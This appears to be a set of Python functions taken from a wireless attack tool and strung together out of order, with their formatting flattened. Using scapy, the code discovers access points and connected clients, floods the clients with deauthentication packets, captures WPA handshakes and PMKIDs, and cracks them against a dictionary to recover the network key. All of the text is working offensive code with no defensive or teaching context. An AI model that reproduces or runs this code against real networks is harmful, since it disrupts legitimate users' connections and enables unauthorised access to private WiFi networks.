def d_h_crack(self, ap, timeout): global WRITE__ y_h = False while not y_h: pull.up( 'Locating Clients from AP to generate handshake. Sleeping for %d Seconds. ' % timeout) self.sniper = Sniper(self.iface, ap['bssid'], ap['essid'], ap['channel'], timeout) self.sniper.cl_generator() cls__ = self.sniper.clients() pull.info('Clients Detected. Number of Connected Users: %d' % len(cls__)) if cls__: for tup in cls__: if V__: pull.up('Attempting to Dissociate %s from AP. Detected Range: %d'\ % (color.RED+tup[0].upper()+color.END, tup[1] if tup[1] != -999 else -1)) else: pull.up('Attempting to Dissociate %s from Access Point.'\ % (color.RED+tup[0].upper()+color.END)) pkts__ = self.sniper.shoot(tup[0]) if V__: pull.up('Checking For Valid Handshake b/w "%s" and "%s"'\ % (color.BOLD+ap['essid']+color.END, color.BOLD+tup[0].upper()+color.END)) if pkts__[0]: y_h = not False if V__: pull.use('Handshake SucessFull. MAC: %s' % tup[0].upper()) pull.right('Vendor (AP): %s Vendor (Client): %s'\ % (org(ap['bssid']).org, org(tup[0]).org) ) else: pull.use( 'Handshake Got Successful. Attempting to Save it. ' ) if WRITE__: h_path = self.save_handshake( pkts__[1], ap['bssid']) if V__: pull.info('Saved handshake in %s' % h_path) if self.call_PSK(pkts__[1], ap['essid'], ap['auth']): sys.exit(0) else: pull.error( 'No Handshake Found. Skippingg to Next Client ...') time.sleep(2) else: pull.error( 'Sorry, but shutting Down. No connected users found in the target network.' ) sys.exit(0)
def flood_ap(self, _pkt, _br): if self.verbose: self.pull.up("%d %s (%s) %s<>%s %s (%s) %s[DEAUTHENTICATION]%s" % (self.deauth, self.ap.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.ap).org+self.pull.END, \ self.pull.RED, self.pull.END, _br.replace(':', '').upper(), \ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, \ self.pull.BLUE, self.pull.END )) else: self.pull.up("%d %s %s<>%s %s %s[DEAUTHENTICATION]%s" % (self.deauth, self.ap.replace(':', '').upper(),\ self.pull.RED, self.pull.END, _br.replace(':', '').upper(), \ self.pull.BLUE, self.pull.END )) sendp(_pkt, iface=self.iface, count=self.deauth, verbose=False) time.sleep(1)
def get_asso_resp(self, pkt): if pkt.haslayer(Dot11AssoResp): if pkt.getlayer(Dot11AssoResp).status == 0: sn = pkt.getlayer(Dot11).addr2.replace(':', '') rc = pkt.getlayer(Dot11).addr1.replace(':', '') if rc == self.cl.replace(':', '') and sn == self.ap.replace( ':', ''): self.pull.info("1 Frames %s > %s %s[Association Response]%s" % (self.ap.replace(':', '').upper(),\ self.cl.replace(':', '').upper(), self.pull.YELLOW, self.pull.END)) if self.verbose: self.pull.info( "Association with Access Point %s[SuccessFull]%s" % (self.pull.GREEN, self.pull.END)) self.pull.info("Waiting For EAPOL to initate...") if pkt.haslayer(EAPOL): sn = pkt.getlayer(Dot11).addr2.replace(':', '') nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90] mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186] fNONCE = "0000000000000000000000000000000000000000000000000000000000000000" fMIC = "00000000000000000000000000000000" if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC: self.__ASSO_STEP = True self.pull.up("EAPOL %s > %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.cl.replace(':', '').upper(),\ self.pull.BOLD+self.pull.GREEN, self.pull.END) ) if self.verbose: self.pull.info("Successfull handshake initiated [%s]" % org(self.ap).org) self.__EAPOL = pkt raise ValueError
def print_back(self): time.sleep(2) if self.verbose: self.pull.up("Cracking %s (%s) %s<>%s %s (%s) %s[%s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END, self.pull.RED, self.pull.END, \ self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.essid, self.pull.END)) else: self.pull.up("Cracking %s %s<>%s %s %s[%s]%s" % (self.bssid.replace(':', '').upper(), self.pull.RED, self.pull.END, \ self.cl.replace(':', '').upper(), self.pull.GREEN, self.essid, self.pull.END))
def organize(self): self.pull.up("Validating Received Captures...") for l in self.lines: _eq_ = l.split("*") _pm, _ap, _cl, _ess = _eq_[0], _eq_[1], _eq_[2], _eq_[3] self.__PMKIDS.append((_pm, _ap, _cl, _ess)) if self.verbose: self.pull.info("PMKID %s (%s) %s<>%s %s (%s) %s[RECEIVED]%s" % (_ap.upper(), self.pull.DARKCYAN+org(self.hwaddr(_ap)).org+self.pull.END, self.pull.RED, self.pull.END, \ _cl.upper(), self.pull.DARKCYAN+org(self.hwaddr(_cl)).org+self.pull.END, self.pull.YELLOW, self.pull.END)) else: self.pull.info("PMIID %s %s<>%s %s %s[RECEIVED]%s" % (_ap.upper(), self.pull.RED, self.pull.END, \ _cl.upper(), self.pull.YELLOW, self.pull.END)) time.sleep(1)
def cl_generator_replay(self, pkt): if pkt.haslayer(Dot11) and pkt.getlayer( Dot11).type == 2L and not pkt.haslayer(EAPOL): __sn = pkt.getlayer(Dot11).addr2 __rc = pkt.getlayer(Dot11).addr1 if __sn == self.bssid and not (__sn.replace(':', '').lower() in self.out__): try: if self.__CL_COUNTER[__rc] > 1: self.__CONNECTECD_CL[__rc] = self.dbM(pkt) else: self.__CL_COUNTER[__rc] += 1 except KeyError: self.__CL_COUNTER[__rc] = 1 if self.verbose: self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \ self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \ __sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END)) else: self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \ __sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END)) elif __rc == self.bssid and not (__rc.replace(':', '').lower() in self.out__): try: if self.__CL_COUNTER[__sn] > 1: self.__CONNECTECD_CL[__sn] = self.dbM(pkt) else: self.__CL_COUNTER[__sn] += 1 except KeyError: self.__CL_COUNTER[__sn] = 1 if self.verbose: self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \ self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \ __sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END)) else: self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \ __sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
def h_crack(self, ap, p_to_h): if V__: pull.up('Reading Packets from Captured File: %s'\ % p_to_h) pkts = rdpcap(p_to_h) gen = eAPoL(ap['bssid']) for pkt in pkts: comp__ = gen.check(pkt) if comp__: if V__: pull.info('Valid Handshake Found. Manipulaing Data ...') pull.right('AP Manufacturer: %s' % (org(ap['bssid']).org)) break pols = gen.get_pols() self.call_PSK(pols, ap['essid'], ap['auth'])
def flood_silencer(self, pkt): if pkt.haslayer(Dot11) and pkt.getlayer( Dot11).type == 2L and not pkt.haslayer(EAPOL): _sn = pkt.getlayer(Dot11).addr2 _rc = pkt.getlayer(Dot11).addr1 if self.verbose: self.pull.up("%d %s (%s) %s<>%s %s (%s) %s[DEAUTHENTICATION]%s" % (self.deauth, _sn.replace(':', '').upper(), self.pull.DARKCYAN+org(_sn).org+self.pull.END, \ self.pull.RED, self.pull.END, _rc.replace(':', '').upper(), \ self.pull.DARKCYAN+org(_rc).org+self.pull.END, \ self.pull.BLUE, self.pull.END)) else: self.pull.up("%d %s %s<>%s %s %s[DEAUTHENTICATION]%s" % (self.deauth, _sn.replace(':', '').upper(), \ self.pull.RED, self.pull.END, _rc.replace(':', '').upper(), \ self.pull.BLUE, self.pull.END)) self.shoot(_sn, _rc)
def verify(self): self.pull.up("Validating Received Captures...") time.sleep(2) for pkt in self.pkts: self.check(pkt) if 0 not in self.__POLS: self.__POL = True break if self.__POL: if self.verbose: self.pull.info("EAPOL %s (%s) %s<>%s %s (%s) %s[RECEIVED]%s" % (self.bssid.replace(':','').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END, self.pull.RED, self.pull.END, \ self.cl.replace(':','').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.YELLOW, self.pull.END)) else: self.pull.info("EAPOL %s %s<>%s %s %s[RECEIVED]%s" % (self.bssid.replace(':','').upper(), self.pull.RED, self.pull.END, \ self.cl.replace(':','').upper(), self.pull.YELLOW, self.pull.END)) return True else: return False
def sniper_shoot(self, _bss, _ess, _ch, _clients, _tm, _deauth): pull.info("Time Interval [%s] -> Implies Gap b/w Frames is %d" % (pull.DARKCYAN+str(_tm)+pull.END, _tm)) _snip = Sniper(self.iface, _bss, _ess, _ch, _tm, pull, V__) for _ap, _cls in _clients.items(): if _ap == _bss: while not len(self.THEPOL) >= 4: for _cl, _pwr in _cls: if V__: pull.up("%i-> %s (%s) %s><%s %s (%s) %s[Deauthentication]%s" % (_deauth, _cl.replace(':', '').upper(), pull.DARKCYAN+org(_cl).org+pull.END,\ pull.RED, pull.END, _bss.replace(':', '').upper(), pull.DARKCYAN+org(_bss).org+pull.END, pull.RED, pull.END)) else: pull.up("%i-> %s %s><%s %s %s[Deauthentication]%s" % (_deauth, _cl.replace(':', '').upper(),\ pull.RED, pull.END, _bss.replace(':', '').upper(), pull.RED, pull.END)) _sht = threading.Thread(target=_snip.shoot, args=(_cl, _deauth, self), name="T Shooter") _sht.daemon = True _sht.start(); time.sleep(_tm) pull.use("Handshake %s (%s) %s[Captured]%s" % (_bss.replace(':', '').upper(), pull.DARKCYAN+org(_bss).org+pull.END, \ pull.GREEN, pull.END)); break
def loop(self): time.sleep(2) for (_pm, _ap, _cl, _ess) in self.__PMKIDS: if self.verbose: self.pull.up("Cracking %s (%s) %s<>%s %s (%s) %s[%s]%s" % (_ap.upper(), self.pull.DARKCYAN+org(self.hwaddr(_ap)).org+self.pull.END, self.pull.RED, self.pull.END, \ _cl.upper(), self.pull.DARKCYAN+org(self.hwaddr(_cl)).org+self.pull.END, self.pull.GREEN, _pm.upper(), self.pull.END)) else: self.pull.up("Cracking %s %s<>%s %s %s[%s]%s" % (_ap.upper(), self.pull.RED, self.pull.END, \ _cl.upper(), self.pull.GREEN, _pm.upper(), self.pull.END)) (_pass, _pmk) = self.crack(_pm, _ap, _cl, _ess) if _pass: self.pull.use("CRACKED! Key Found %s[%s]%s" % (self.pull.GREEN, _pass, self.pull.END)) self.pull.right("PMK =>") print(self.hexdump(_pmk)) self.pull.right("PMKID =>") print(self.hexdump(_pm)) else: self.pull.error("Not Found! Password Not in Dictionary.")
def beac_shift(self, pkt): if pkt.haslayer(Dot11Beacon): bssid = pkt.getlayer(Dot11).addr2 cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}").split('+') ELTLAYERS = pkt.getlayer(Dot11Elt) if bssid not in self.bss_counter: self.bss_counter.append(bssid) layer_data__ = self.enc_shift(cap, ELTLAYERS) s_or_n = self.filtertify(bssid.lower(), layer_data__) if s_or_n: self.cells.append({'essid': unicode(layer_data__['essid']), 'bssid': unicode(bssid), 'channel': unicode(layer_data__['channel']), 'auth': unicode(layer_data__['auth']), \ 'cipher': unicode(layer_data__['cipher']), 'psk': unicode(layer_data__['psk']), 'pwr': self.dBM_sig(pkt), 'beacon': pkt, 'vendor': unicode(org(bssid).org), 'clients': 0}) self.__ALSA_CLIENTS[bssid] = [] else: for ap in self.cells: if ap['bssid'] == bssid: ap['pwr'] = self.dBM_sig(pkt)
def cl_generator(self): try: sniff(iface=self.iface, prn=self.cl_generator_replay) raise KeyboardInterrupt except KeyboardInterrupt: if self.verbose: self.pull.use("Clients %s (%s) - %s[Found %s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END,\ self.pull.GREEN, len(self.__CONNECTECD_CL), self.pull.END)) else: self.pull.use("Clients %s - [Found %s]" % (self.bssid.replace( ':', '').upper(), len(self.__CONNECTECD_CL)))